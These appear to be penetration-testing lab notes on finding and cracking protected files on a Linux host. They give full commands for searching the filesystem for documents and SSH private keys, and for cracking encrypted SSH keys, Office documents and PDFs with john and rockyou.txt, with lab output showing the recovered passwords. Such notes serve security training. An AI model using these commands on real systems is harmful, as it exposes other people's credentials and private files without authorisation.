Protected Files
Table of Contents
- Grepping files on the system
- Cracking SSH Private Key Files
- Cracking PDFs and Office DOCs
Grepping files on the system
for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
cry0l1t3@unixclient:~$ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
File extension: .xls
File extension: .xls*
File extension: .xltx
File extension: .csv
/home/cry0l1t3/Docs/client-emails.csv
/home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/header-label.csv
/home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/header.csv
/home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/no-header.csv
/home/cry0l1t3/ruby-2.7.3/gems/test-unit-3.3.4/test/fixtures/plus.csv
/home/cry0l1t3/ruby-2.7.3/test/win32ole/orig_data.csv
File extension: .od*
/home/cry0l1t3/Docs/document-temp.odt
/home/cry0l1t3/Docs/product-improvements.odp
/home/cry0l1t3/Docs/mgmt-spreadsheet.ods
...SNIP...
Grepping SSH Private Keys
as shown in Linux Credential Hunting SSH Keys section.
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
cry0l1t3@unixclient:~$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
/home/cry0l1t3/.ssh/internal_db:1:-----BEGIN OPENSSH PRIVATE KEY-----
/home/cry0l1t3/.ssh/SSH.private:1:-----BEGIN OPENSSH PRIVATE KEY-----
/home/cry0l1t3/Mgmt/ceil.key:1:-----BEGIN OPENSSH PRIVATE KEY-----
Most private keys are encrypted
cry0l1t3@unixclient:~$ cat /home/cry0l1t3/.ssh/SSH.private
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2109D25CC91F8DBFCEB0F7589066B2CC
8Uboy0afrTahejVGmB7kgvxkqJLOczb1I0/hEzPU1leCqhCKBlxYldM2s65jhflD
4/OH4ENhU7qpJ62KlrnZhFX8UwYBmebNDvG12oE7i21hB/9UqZmmHktjD3+OYTsD
...SNIP...
Cracking Encrypted SSH Files
1. turn the file into a hash
/usr/share/john/ssh2john.py id_rsa > ssh.hash
> ssh2john.py SSH.private > ssh.hash
> cat ssh.hash
ssh.private:$sshng$0$8$1C258238FD2D6EB0$2352$f7b...SNIP...
2. crack it with john
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
john ssh.hash --show
> john ssh.hash --show
SSH.private:1234
1 password hash cracked, 0 left
Cracking Microsoft Office Documents
/usr/share/john/office2john.py Protected.docx > protected-docx.hash
cat protected-docx.hash
Protected.docx:$office$*2007*20*128*16*7240...SNIP...8a69cf1*98242f4da37d916305d8e2821360773b7edc481b
john --wordlist=rockyou.txt protected-docx.hash
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234 (Protected.docx)
1g 0:00:00:00 DONE (2022-02-08 01:25) 2.083g/s 2266p/s 2266c/s 2266C/s trisha..heart
Use the "--show" option to display all of the cracked passwords reliably
Session completed
john protected-docx.hash --show
Protected.docx:1234
Cracking PDF Documents
pdf2john.py PDF.pdf > pdf.hash
cat pdf.hash
john --wordlist=rockyou.txt pdf.hash
john pdf.hash --show
Mutation of password lists is crucial for cracking password-protected files and access points. Known password lists are often ineffective due to system defenses and users being forced to use stronger, random passwords or passphrases. Despite the challenges, cracking such files is worthwhile as they may contain sensitive data useful for further access.